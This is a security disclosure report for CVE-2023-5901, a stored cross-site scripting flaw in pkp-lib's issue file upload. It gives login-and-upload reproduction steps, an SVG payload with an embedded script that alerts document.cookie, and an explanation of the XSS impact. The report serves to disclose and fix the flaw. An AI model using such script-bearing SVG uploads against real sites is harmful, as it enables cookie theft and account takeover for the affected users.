CVE-2023-5901: Cross-Site Scripting ( XSS) Via file upload in pkp-lib

Description

I tested the demo site you provided. I see that there is a file upload vulnerability which can lead to XSS. Hope you check and find a solution as soon as possible.

Proof of Concept

link video Poc

https://drive.google.com/file/d/1LAcTulbfhGJfCmWdIel9e-Sk__uoQbDq/view?usp=sharing

Steps

1 .Login as account demo

2 .Access the module issues

3 .Then create an issue

4 .Upload an SVG file with the following content:

         <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
             <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
             <script type="text/javascript">
                     alert(document.cookie);
             </script>
          </svg>

5 .Save the issue and access the newly created issue, then access the just uploaded SVG file and the payload will be executed

Impact

XSS (Cross-Site Scripting) is a type of web security vulnerability caused by improper input validation and inadequate data sanitization in a web application. It occurs when an attacker injects malicious scripts (usually in the form of HTML or JavaScript) into a website’s database or storage, which is then fetched and displayed to unsuspecting users. These scripts are executed in the browsers of those who visit the infected page, enabling the attacker to steal sensitive information, such as login credentials or personal data, and potentially take control of the user’s account or perform malicious actions on their behalf. To prevent stored XSS, developers must implement proper input validation and output encoding to ensure that user-supplied data is treated as plain text and not executed as code on the web page.